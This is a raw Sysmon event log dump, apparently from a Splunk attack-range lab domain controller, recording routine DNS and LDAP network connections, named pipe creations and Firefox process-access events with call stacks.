354300x80000000000000005918284Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.952{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local63596- 354300x80000000000000005918283Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.952{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local63596-true0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domain 354300x80000000000000005918282Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.952{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local54650- 354300x80000000000000005918281Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.947{896A638B-B5C8-6058-0B00-00000000AE01}612C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local1026-true0:0:0:0:0:0:0:1win-dc-792.attackrange.local389ldap 354300x80000000000000005918280Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.947{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local1026-true0:0:0:0:0:0:0:1win-dc-792.attackrange.local389ldap 354300x80000000000000005918279Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.946{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-792.attackrange.local53domainfalse10.0.1.14win-dc-792.attackrange.local54148- 354300x80000000000000005918278Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.945{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-792.attackrange.local1025-false10.0.1.14win-dc-792.attackrange.local53domain 354300x80000000000000005918277Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.945{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-792.attackrange.local1025-false10.0.1.14win-dc-792.attackrange.local53domain 354300x80000000000000005918276Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.944{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-792.attackrange.local53domainfalse10.0.1.14win-dc-792.attackrange.local54083- 354300x80000000000000005918275Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.944{896A638B-B5CA-6058-1400-00000000AE01}1052C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruefalse10.0.1.14win-dc-792.attackrange.local54083-false10.0.1.14win-dc-792.attackrange.local53domain 354300x80000000000000005918274Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.943{896A638B-B5DB-6058-2700-00000000AE01}3020C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-792.attackrange.local54762- 354300x80000000000000005918273Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.748{896A638B-B5C0-6058-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local1527-truefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local445microsoft-ds 354300x80000000000000005918272Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:43.748{896A638B-B5C0-6058-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local1527-truefe80:0:0:0:d5e5:e17e:c4fa:f709win-dc-792.attackrange.local445microsoft-ds 354300x80000000000000005918271Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.765{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1526-false10.0.1.12-8000- 23542300x80000000000000005918270Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.365{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E11D0DA1AFBB263AC20AF31EAFE3711,SHA256=5112AFEC539CD5EBE82007FFFD47BAA5AD8411E90B36E9D01BDE9D21F8F4E2D8,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000005918269Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:46.315{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.163.61286839C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000005918268Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:46.314{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.162.59941942C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918267Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.314{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-C9B1-6058-4E07-00000000AE01}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+41f76c|C:\Program Files\Mozilla Firefox\xul.dll+41f6bc|C:\Program Files\Mozilla Firefox\xul.dll+11bf6a8|C:\Program Files\Mozilla Firefox\xul.dll+12169d1|C:\Program Files\Mozilla Firefox\xul.dll+17ac861|C:\Program Files\Mozilla Firefox\xul.dll+29495ef|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 17141700x80000000000000005918266Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:46.314{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.161.141786498C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918265Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.314{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-C9B1-6058-4E07-00000000AE01}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+41f76c|C:\Program Files\Mozilla Firefox\xul.dll+41f6bc|C:\Program Files\Mozilla Firefox\xul.dll+11bf6a8|C:\Program Files\Mozilla Firefox\xul.dll+12168d1|C:\Program Files\Mozilla Firefox\xul.dll+17ac67e|C:\Program Files\Mozilla Firefox\xul.dll+29495ef|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 17141700x80000000000000005918264Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:46.314{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.160.207775747C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918263Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.313{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-C9B1-6058-4E07-00000000AE01}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+41f76c|C:\Program Files\Mozilla Firefox\xul.dll+41f6bc|C:\Program Files\Mozilla Firefox\xul.dll+11bf6a8|C:\Program Files\Mozilla Firefox\xul.dll+12167d1|C:\Program Files\Mozilla Firefox\xul.dll+17ac4c4|C:\Program Files\Mozilla Firefox\xul.dll+29495ef|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 17141700x80000000000000005918262Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:46.313{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.159.81332423C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918261Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.313{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-C9B1-6058-4E07-00000000AE01}3544C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+41f76c|C:\Program Files\Mozilla Firefox\xul.dll+41f6bc|C:\Program Files\Mozilla Firefox\xul.dll+11bf6a8|C:\Program Files\Mozilla Firefox\xul.dll+12166d1|C:\Program Files\Mozilla Firefox\xul.dll+17ac305|C:\Program Files\Mozilla Firefox\xul.dll+29495ef|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 17141700x80000000000000005918260Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-CreatePipe2021-03-24 21:50:46.313{896A638B-C9AE-6058-4C07-00000000AE01}3420\chrome.3420.158.172984673C:\Program Files\Mozilla Firefox\firefox.exe 10341000x80000000000000005918259Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.313{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+51f21|C:\Program Files\Mozilla Firefox\xul.dll+297003d|C:\Program Files\Mozilla Firefox\xul.dll+2969a29|C:\Program Files\Mozilla Firefox\xul.dll+29494c3|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918258Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.313{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 10341000x80000000000000005918257Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.313{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 10341000x80000000000000005918256Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.313{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 10341000x80000000000000005918255Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.313{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 10341000x80000000000000005918254Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.313{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 10341000x80000000000000005918253Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.313{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 10341000x80000000000000005918252Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.313{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 10341000x80000000000000005918251Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.313{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+41eae1|C:\Program Files\Mozilla Firefox\xul.dll+111f93e|C:\Program Files\Mozilla Firefox\xul.dll+11ee11d|C:\Program Files\Mozilla Firefox\xul.dll+11c276a|C:\Program Files\Mozilla Firefox\xul.dll+11c2624|C:\Program Files\Mozilla Firefox\xul.dll+d238aa|C:\Program Files\Mozilla Firefox\xul.dll+29491c4|C:\Program Files\Mozilla Firefox\xul.dll+29664d8|C:\Program Files\Mozilla Firefox\xul.dll+c11624|C:\Program Files\Mozilla Firefox\xul.dll+cb26dd|C:\Program Files\Mozilla Firefox\xul.dll+41e78|C:\Program Files\Mozilla Firefox\xul.dll+113621f|C:\Program Files\Mozilla Firefox\xul.dll+110e84f|C:\Program Files\Mozilla Firefox\xul.dll+401be|C:\Program Files\Mozilla Firefox\xul.dll+3f8798|C:\Program Files\Mozilla Firefox\xul.dll+3f765f|C:\Program Files\Mozilla Firefox\xul.dll+39329aa|C:\Program Files\Mozilla Firefox\xul.dll+39cc055|C:\Program Files\Mozilla Firefox\xul.dll+39cd3a9|C:\Program Files\Mozilla Firefox\xul.dll+3f33|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c248 10341000x80000000000000005918250Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:46.312{896A638B-C9AE-6058-4C07-00000000AE01}34202880C:\Program Files\Mozilla Firefox\firefox.exe{896A638B-B436-605B-9269-00000000AE01}3732C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 